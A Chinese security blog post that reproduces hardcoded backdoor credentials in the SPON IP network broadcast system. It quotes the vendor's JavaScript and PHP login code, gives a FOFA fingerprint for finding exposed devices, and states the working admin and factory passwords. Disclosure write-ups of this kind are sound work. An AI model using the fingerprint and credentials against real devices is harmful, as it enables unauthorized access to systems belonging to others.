记一次硬编码密码后门账号问题

于 2024-10-04 09:53:45 发布
阅读量529 收藏 9
点赞数 4
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77012231/article/details/142699851
版权

漏洞描述

SPON世邦IP网络广播系统采用的IPAudio™技术, 将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输的双向音频扩声系统。传统广播系统存在的音质不佳,传输距离有限,缺乏互动等问题。该系统设备使用简便,只需将终端接入计算机网络即可构成功能强大的数字广播系统,每个接入点无需单独布线,实现计算机网络、数字视频监控、公共广播的多网合一。该系统存在后门账号/硬编码的问题,攻击者可以使用后门账号实现登录

漏洞复现

FOFA

icon_hash="-1830859634"

此漏洞是通过JS代码审计,找到多个接口存在固定的后门账号并且可以登录。

JSFinder提取js文件

/js/index.js?t=

var languageData;
var browserType = false;
var isRegisted = false;
var theme = localStorage.getItem('theme');
//一、定义一个获取DOM元素的方法
var dom = function(selector){
    return document.querySelector(selector);
},
box = dom(".drag"),//容器
bg = dom(".bg"),//背景
text = dom(".text"),//文字
slider = dom(".slider"),//滑块
success = false;//是否通过验证的标志

$(function() {
    $(document).bind("contextmenu", function(e) {
        return false;
    });

    document.getElementById("imglogo").src = "../images/login.png?t=" + Math.random();
    if (theme == null) {
        localStorage.setItem('theme', 'green');
        theme = 'green';
        var link = $('head').find('link:last');
        link.attr('href', 'vendors/custom/themes/index_green.css?t=' + Math.random());
    } else {
        var link = $('head').find('link:last');
        link.attr('href', 'vendors/custom/themes/index_' + theme + '.css?t=' + Math.random());
    }

    if (theme === null || theme === 'green') {
        $('#tbuser').css('color', '#73879c');
        $('#tbpass').css('color', '#73879c');
        $('#cblang').css('color', '#73879c');
    } else if (theme === 'black') {
        $('#tbuser').css('color', '#b1b1b1');
        $('#tbpass').css('color', '#b1b1b1');
        $('#cblang').css('color', '#b1b1b1');
    }
    
    var protocolStr = document.location.protocol;
    if (protocolStr == "https:")
    {
    	document.getElementById("divDrag").style.display = "";
    	success = false;
    }
    else
    {
    	document.getElementById("divDrag").style.display = "none";
    	success = true;
    }

    $('#btnlic').bind('click', function() {
        var regcode = $('#licregcode').val();
        var jsonData = {
            "regcode": regcode
        };
        $.ajax({
            type: "POST",
            url: "../php/reglicense.php",
            dataType: "json",
            data: {
                "jsondata": jsonData
            },
            success: function(resData) {
                if (resData.res == 1) {
                    isRegisted = true;
                    $('#setlicwin').modal('hide');
                    toastr.info(languageData.license_soft_ok, languageData.common_tip);
                } else {
                    toastr.error(languageData.license_soft_not, languageData.common_tip);
                }
            },
            error: function() {
                toastr.error(languageData.license_soft_not, languageData.common_tip);
            }
        });
    });

    forbidBackward();

    toastr.options = {
        "closeButton": true,
        "debug": false,
        "newestOnTop": true,
        "progressBar": false,
        "rtl": false,
        "positionClass": "toast-top-center",
        "preventDuplicates": true,
        "onclick": null,
        "showDuration": 100,
        "hideDuration": 500,
        "timeOut": 2000,
        "extendedTimeOut": 800,
        "showEasing": "swing",
        "hideEasing": "linear",
        "showMethod": "fadeIn",
        "hideMethod": "fadeOut"
    };

	LoadLanguages();

    var lan = GetLocalValue("lang");
    if (!lan)
    	lan = getSystemLanguage();
    $('#cblang').val(lan);
    SaveLocal("lang", lan);
    InitLanguage(lan);

    isRegisted = false;
    $.ajax({
        type: "POST",
        url: "../php/getlicense.php",
        dataType: "json",
        success: function(resData) {
            var lic = resData.isreg;
            var projpwdenabeld = resData.projpwdenabeld || "0";
            window.sessionStorage.setItem("projpwdenabeld", projpwdenabeld);
            if (lic === "1" || lic === "2" || lic === "3") {
                isRegisted = true;
            } else {
                isRegisted = false;
                changeLicense();
                $('#setlicwin').modal('show');
            }
        },
        error: function(e) {
            alert("App Server connect fail!");
        }
    });

    $("#cblang").change(function() {
        var newValue = $(this).val();
        var tmpLang = newValue || "zh";
        SaveLocal("lang", tmpLang);
        InitLanguage(tmpLang);
    });

    $('#btnlogin').bind('click', function() {
        if (isRegisted == false) {
            $('#setlicwin').modal('show');
            return;
        }

        if (success == false) {
        	toastr.error(languageData.sliderTip, languageData.common_tip);
            return;
        }

        var user = $('#tbuser').val();
        var passwd = $('#tbpass').val();
        var isencrypted = "0";
        if (user == "administrator" && passwd == "800823") {
            isencrypted = "0";
        } else {
            var b = new SPON_Base64("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=");   //标准base64
            passwd = b.encode(passwd).split("").reverse().join(""); //反转
            isencrypted = "1";
        }

        var jsonData = {
            "username": user,
            "password": passwd,
            "isencrypted": isencrypted
        };

        $.ajax({
            type: "POST",
            url: "../php/login.php",
            dataType: "json",
            data: {
                "jsondata": jsonData
            },
            success: function(json) {
                if (json.res != 1) {
                    toastr.error(languageData.index_loginfail, languageData.common_tip);
                } else {                	
	        		SaveLocal("alreadybct", "0");
                    SaveSession(json.username, json.display, json.modules, json.isadmin, "spon", json.token);
                    var mainurl = json.mainurl || "main";
                    var tourl = './html/' + mainurl + '.html?t=' + Math.random();
                    self.location = tourl;
                }
            },
            error: function() {
                toastr.error(languageData.index_loginfail, languageData.common_tip);
            }
        });
    });
});

function BrowserType() {
    var userAgent = navigator.userAgent; //取得浏览器的userAgent字符串
    var isOpera = userAgent.indexOf("Opera") > -1; //判断是否Opera浏览器
    var isIE = ((!!window.ActiveXObject || "ActiveXObject" in window) || (userAgent.indexOf("compatible") > -1 && userAgent.indexOf("MSIE") > -1 && !isOpera)); //判断是否IE浏览器
    var isEdge = userAgent.indexOf("Edge") > -1; //判断是否IE的Edge浏览器
    var isFF = userAgent.indexOf("Firefox") > -1; //判断是否Firefox浏览器
    var isSafari = userAgent.indexOf("Safari") > -1 && userAgent.indexOf("Chrome") == -1; //判断是否Safari浏览器
    var isChrome = userAgent.indexOf("Chrome") > -1 && userAgent.indexOf("Safari") > -1; //判断Chrome浏览器
    browserType = (isIE || isEdge);
}

function LoadLanguages(){
	// 读取配置的多语言
    var dataroot = "../lan/language.json?t=" + Math.random();
    $.ajax({
        type: "GET",
        async: false,
        url: dataroot,
        success: function(resData) {
        	var langlist = eval(resData);
        	for(var p in langlist){
                $('#cblang').append("<option value='" + langlist[p].id + "'>" + langlist[p].name + "</option>");
			}
        },
        error: function(e) {
        }
    });	
}

function InitLanguage(soLang) {	
    var dataroot = "../lan/" + soLang + ".json?t=" + Math.random();
    $.ajax({
        type: "GET",
        async: false,
        url: dataroot,
        success: function(resData) {
            languageData = eval("(" + resData + ")");
            //console.log(languageData);
            document.getElementById('labelcopyright').innerHTML = languageData.copyright;
            document.getElementById("title").innerText = languageData.login_title;
            document.getElementById("login_title").innerText = languageData.login_title;
            document.getElementById("tbuser").placeholder = " " + languageData.userlist_col_username;
            document.getElementById("tbpass").placeholder = " " + languageData.userlist_col_password;
            document.getElementById("btnlogin").innerText = languageData.index_login;

            document.getElementById('labellicstate').innerHTML = languageData.license_state;
            document.getElementById('labellicallowcount').innerHTML = languageData.license_allow_count;
            document.getElementById('labellicallowtime').innerHTML = languageData.license_allow_time;
            document.getElementById('labellicmaccode').innerHTML = languageData.license_machine_code;
            document.getElementById('labellicregcode').innerHTML = languageData.license_reg_code;
            document.getElementById('setlicwinLabel').innerHTML = languageData.main_license;
            document.getElementById('labelbtnlic').innerHTML = languageData.main_license;
            document.getElementById('slidertext').innerHTML = languageData.sliderTip;
        },
        error: function(e) {
            alert("服务器连接失败  (WEB Server connect fail!)");
        }
    });
    switch (soLang) {
        case 'zh':
            $('#login_title').css('font-size', '30px');
            $('#login_title').css('margin-top', '10px');
            break;
        case 'en':
            $('#login_title').css('font-size', '25px');
            $('#login_title').css('margin-top', '15px');
            break;
        case 'russian':
            $('#login_title').css('font-size', '20px');
            $('#login_title').css('margin-top', '15px');
            break;
    }
}

function getQueryString(name) {
    var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)", "i");
    var r = window.location.search.substr(1).match(reg);
    if (r != null)
        return decodeURI(r[2]);
    return null;
}

function forbidBackward() {
    if (window.history && window.history.pushState) {
        $(window).on('popstate', function() {
            window.history.pushState('forward', null, '#');
            window.history.forward(1);
        });
    }
    window.history.pushState('forward', null, '#'); //在IE中必须得有这两行

    window.history.forward(1);
}

function getSystemLanguage() {
    var language = (navigator.language || navigator.browserLanguage).toLowerCase();
    if (language.indexOf('zh') > -1) {
        return 'zh';
    } else if (language.indexOf('rus') > -1) {
        return 'russian';
    } else {
        return 'en';
    }
}

function changeLicense() {
    $.ajax({
        type: "POST",
        url: "../php/getlicense.php",
        dataType: "json",
        success: function(resData) {
            var lic = resData.isreg;
            if (lic === "1") {
                $('#licstate').val("soft");
            } else if (lic === "2") {
                $('#licstate').val("hardware");
            } else {
                $('#licstate').val("none");
            }
            $('#licallowcount').val(resData.maxcount);
            $('#licallowtime').val(resData.maxtime);
            $('#licmaccode').val(resData.maccode);
            $('#licregcode').val(resData.regcode);
        },
        error: function(e) {
            alert("服务器连接失败 (App Server connect fail!)");
        }
    });
}
distance = box.offsetWidth - slider.offsetWidth;//滑动成功的宽度(距离)

//二、给滑块注册鼠标按下事件
slider.onmousedown = function(e){
    //1.鼠标按下之前必须清除掉后面设置的过渡属性
    slider.style.transition = "";
    bg.style.transition ="";
    //说明:clientX 事件属性会返回当事件被触发时,鼠标指针向对于浏览器页面(或客户区)的水平坐标。
    //2.当滑块位于初始位置时,得到鼠标按下时的水平位置
    var e = e || window.event;
    var downX = e.clientX;
    //三、给文档注册鼠标移动事件
    document.onmousemove = function(e){
        var e = e || window.event;
        //1.获取鼠标移动后的水平位置
        var moveX = e.clientX;
        //2.得到鼠标水平位置的偏移量(鼠标移动时的位置 - 鼠标按下时的位置)
        var offsetX = moveX - downX;
        //3.在这里判断一下:鼠标水平移动的距离 与 滑动成功的距离 之间的关系
        if( offsetX > distance){
            offsetX = distance;//如果滑过了终点,就将它停留在终点位置
        }else if( offsetX < 0){
            offsetX = 0;//如果滑到了起点的左侧,就将它重置为起点位置
        }
        //4.根据鼠标移动的距离来动态设置滑块的偏移量和背景颜色的宽度
        slider.style.left = offsetX + "px";
        bg.style.width = offsetX + "px";
        //如果鼠标的水平移动距离 = 滑动成功的宽度
        if( offsetX == distance){
            //1.设置滑动成功后的样式
            text.innerHTML = languageData.validationPassed;
            text.style.color = "#fff";
            slider.innerHTML = "&radic;";
            slider.style.color = "green";
            bg.style.backgroundColor = "lightgreen";
            //2.设置滑动成功后的状态
            success = true;
            //成功后,清除掉鼠标按下事件和移动事件(因为移动时并不会涉及到鼠标松开事件)
            slider.onmousedown = null;
            document.onmousemove = null;
            //3.成功解锁后的回调函数
            // setTimeout(function(){
            //     // alert('解锁成功!');
            //     lock = false;
            // },100);
        }
    }
    //四、给文档注册鼠标松开事件
    document.onmouseup = function(e){
        //如果鼠标松开时,滑到了终点,则验证通过
        if(success){
            return;
        }else{
            //反之,则将滑块复位(设置了1s的属性过渡效果)
            slider.style.left = 0;
            bg.style.width = 0;
            slider.style.transition = "left 1s ease";
            bg.style.transition = "width 1s ease";
        }
        //只要鼠标松开了,说明此时不需要拖动滑块了,那么就清除鼠标移动和松开事件。
        document.onmousemove = null;
        document.onmouseup = null;
    }
}

这里的账号密码是写死的

访问/php/login.php使用账号administrator 密码800823可以直接登录后台

/html/factory.html 接口处也存在硬编码问题

/html/factory.html 厂商维护界面。

在/js/factory.js的源码中显示,厂商维护界面的密码是硬编码,写死在js中,所以可以通过"Rdc070#*"登录。

/js/factory.js

$(function() {
	loadfactorydata();
	
    $("#btnfactory").bind('click', function() {
        var factory_password = $("#inputfactory").val();
        if (factory_password == "Rdc070#*") {
            // $("#select_type").css("display", "");
            $("#select_type").fadeIn();
        } else {
            alert("密码输入错误, 请重新输入!")
        }
    });
    	
    $("#btnfactorysave").bind('click', function() {
        var webtype = $("#type_value").val(); //版本类型
        var datatype = $("#NAS_type").val();  //NAS版本类型
        var enableifly = $("#enable_ifly").val();  //NAS版本类型
        var meetmaxcount = $("#cbMeetingMaxCount").val();  //最大会议数量
        var meetgroupcount = $("#cbMeetingGroupCount").val();  //最大会议组
        
        var jsonData = {
            "webtype": webtype,
            "datatype": datatype,
            "enableifly": enableifly,
            "meetmaxcount": meetmaxcount,
            "meetgroupcount": meetgroupcount
        };

        $.ajax({
            type: "POST",
            url: "../php/setfactoryconf.php",
            dataType: "json",
            data: {
                "jsondata": jsonData
            },
            success: function(json) {
                if (json.res != 1) {
                	alert('保存失败!!!');
                } else {         
                	alert('保存成功.');
                }
            },
            error: function() {
                alert('保存失败!!!');
            }
        });
    });
});

function loadfactorydata()
{
    $.ajax({
        type: "POST",
        url: "../php/getfactoryconf.php",
        dataType: "json",
        success: function(json) {
        	$("#type_value").val(json.webtype);
        	$("#NAS_type").val(json.datatype);
        	$("#enable_ifly").val(json.enableifly);
        	$("#cbMeetingMaxCount").val(json.meetmaxcount);
        	$("#cbMeetingGroupCount").val(json.meetgroupcount);
        },
        error: function() {
        }
    });	
}

 后门密码 Rdc070#*

成功登录

 /php/login.php

<?php
	require_once ('conversion.php');

	$postData = $_POST['jsondata'];
	$arr['res'] = 0;

	if (isset($postData['username'])) {
		$user = $postData['username'];
		$pass = $postData['password'];
		
		if ('800823' == $pass && 'administrator' == $user)
		{
			$arr['username'] = 'administrator';
			$arr['password'] = '800823';
			$arr['display'] = 'administrator';
			$arr['modules'] = '1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1';
			$arr['rights'] = '*';
			$arr['serverrights'] = '*';
			$arr['isadmin'] = '1';
			$arr['bindterminals'] = '';
			$arr['res'] = 1;
			$arr['mainurl'] = 'main';
			$arr['token'] = 'SESSION';
			echo JSON($arr);
		}
		else
		{
			$result = UdpSendAndRecvJson($postData, "login");
			echo $result;
		}
	}
?>

这个地方的密码也是写死的

摸金校尉-马
关注
[网络安全自学篇] 七十三.WannaCry勒索病毒复现及分析(四)蠕虫传播机制全网源码详细解读
杨秀璋的专栏
05-05 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了逆向分析OllyDbg动态调试工具的基本用法,包括界面介绍、常用快捷键和TraceMe案例分析。这篇文章将继续详细讲解WannaCry蠕虫的传播机制,带领大家详细阅读源代码,分享WannaCry勒索病毒是如何传播感染的。作者分析该病毒一个月,一方面觉得自己技术菜,另一方面深知系统安全需要坚持,继续加油。希望文章对您有所帮助~
[系统安全] 二十五.WannaCry勒索病毒分析 (1)Python复现永恒之蓝漏洞实现勒索加密
杨秀璋的专栏
02-27 1万+
作者前文介绍了逆向分析之OllyDbg动态调试工具,包括INT3断点、反调试、硬件断点和内存断点。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,第一篇文章将采用Github资源实现永恒之蓝漏洞利用及Windows7系统文件加密。希望这系列文章对您有所帮助,漫漫长征路,偏向虎山行。享受过程,一起加油~
滑动验证
weixin_45743799的博客
11-12 2915
拖动滑块进行验证码的验证。 滑动验证有两种: 图片滑动验证 长方形的滑动条验证 一 : 图片滑动验证 效果演示 原始样式 没有正确验证的时候滑块会直接回到初始位置让你再次滑动验证 验证成功会给出提示 看代码之前**注意:**代码中要引入相应架包 <script type="text/javascript" src="js/jquery.min.js"></script&g...
发布自己的module - 我的第一个npm组件!
weixin_34124651的博客
08-12 1319
问题来源 前段时间去帮朋友的公司,重构一个前端项目,大致把原项目浏览了一遍,然后就风风火火的开干了,框架选型用了最流行的React+Reflux,然而第一个首页就遇到个问题,源项目有一个fullpage组件开发的全屏切换,却不被React支持。然后就去Github上去找,结果没找到一个好用的,然后就想,我是否能自己开发一个呢。 准备工具 ...
全国职业院校技能大赛网络建设与运维赛项赛题(一)
yuhongkui的专栏
04-30 4028
全国职业院校技能大赛网络建设与运维赛题(一)一、竞赛项目简介“网络建设与运维”竞赛共分 A.网络理论测试(从公布赛题模块一中随机抽取选择题70道,判断题30道);B.网络建设与调试;C.服务搭建与运维等三个模块。竞赛时间安排和分值权重见表1表 1 竞赛时间安排与分值权模块比赛时长分值模块一网络理论测试0.5小时10%模块二网络建设与调试6.5小时40%模块三服务搭建与运维50%合计7小时100%二、竞赛注意事项1.竞赛期间禁止携带和使用移动存储设备、计算器、通信工具及参考资料。2.请根据大赛所提供的竞赛环境
Python通用编程规范-09 安全编程规范
zhao12501的博客
04-26 2464
1.9 安全编程规范 1.9.1 异常行为 1.9.1.1 禁止抑制或者忽略已检查异常 【说明】: 编码人员常常会通过一个空的或者无意义的catch块来抑制捕获的已检查异常。每一个catch块都应该确保程序只会在继续有效的情况下才会继续运行下去。因此,catch块必须要么从异常情况中恢复,要么重新抛出适合当前catch块上下文的另一个异常以允许最邻近的外层try-catch语句块来进行恢复工作。异常会打断应用原本预期的控制流程。例如,try块中位于异常发生点之后的任何表达式和语句都不会被执行。因此,异常必须
在一款D-Link消费级路由器上,我发现了10个严重漏洞
热门推荐
weixin_33989058的博客
09-15 1万+
本文讲的是在一款D-Link消费级路由器上,我发现了10个严重漏洞,近期,信息安全研究员皮埃尔·金(Pierre·Kim)公开了D-Link DIR 850L消费级无线路由器存在的10个严重漏洞。 此次公开的D-Link漏洞涉及多方面问题,如缺乏对固件映像的适当保护机制,意味着黑客可以向目标设备注入包含后门的恶意拷贝,以及D-Link私有的mydlin...
滑动验证框
12-25
滑动验证框jquerry,用户登录注册验证码。滑动验证,javascript脚本验证
滑动验证码
12-20
不同于各大验证码提供平台,我们给出了制作一个验证码的前端源码。本资源对于想自己制作滑动验证码的人,提供了一个思路。(直接打开index.html查看demo)
npm发布自己的组件组件/插件包
算命de博客
06-04 703
提升大型人工智能模型的智能水平是一场全方位的革新,它要求我们在数据处理、架构设计、学习机制、多模态整合、可解释性及学习动态性等多个维度进行深入探索与实践。通过这些策略的综合应用,我们不仅能够推动模型性能的飞跃,还能确保AI技术的健康发展,使其在复杂多变的现实世界中展现出更加智慧、可靠的一面。未来的人工智能之路,将是在不断挑战与应对中,追求更加高级智能的征途。
npm发布自己的组件
苦作舟的空城机
02-02 1238
作为一个前端打工人,可以尝试自己编写一些UI组件。 编写组件虽说不一定要使用,但也可以更好的提升自己的能力,在编写的过程中让自己思考变得更加全面 组件编写好之后肯定不能以后调用时就复制文件夹过去,这样太low了。前端人员可以将组件发布到npm上,以后就可以npm install下载自己的组件 npm发布流程 一、创建npm账号 npm官网:npm官网 注册npm的账号非常简单,只需要一个邮箱即可,连手机都不需要 二、创建自己的组件 我创建的vue组件,npm init新建一个项目 在npm初始化时 pa
npm 发布自己的组件库
m0_63542260的博客
06-05 551
如果你还没有 npm 账号,可以在 npm 官网上注册一个账号。:编写你的组件库代码,并确保代码结构清晰,注释完善,功能完备。命令来初始化项目,并按照提示填写项目信息。命令,输入你的 npm 账号信息进行登录。:首先,在你的组件库项目目录下运行。:每次更新组件库代码后,得修改。命令来发布你的组件库。
滑动验证识别
rrrrroottttttt的博客
05-23 443
确保你的系统中安装了 ChromeDriver,它用于驱动 Chrome 浏览器。我们需要获取两张图片:一张是完整的背景图片,另一张是带有缺口的背景图片。通过比较这两张图片,我们可以计算出滑块需要移动的距离。我们需要定义一个函数来截取整个网页的截图,并从中裁剪出验证码图片。为了使滑动过程更接近人类操作,我们需要生成一个模拟人类滑动的轨迹。我们首先需要初始化 WebDriver,并设置一些基本的选项。通过比较完整和有缺口的图片的像素差异来确定滑块需要移动的距离。3. 获取完整和有缺口的验证码图片。
在npm发布自己的组件包
最新发布
Pleasure1234的博客
06-07 1536
在学习前端的时候遇到的一个有趣的点,就稍微总结了一下一个小的技巧,值得被录。
滑动验证码-elementui实现
huayunliufeng的博客
08-21 1302
使用elementui框架实现。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值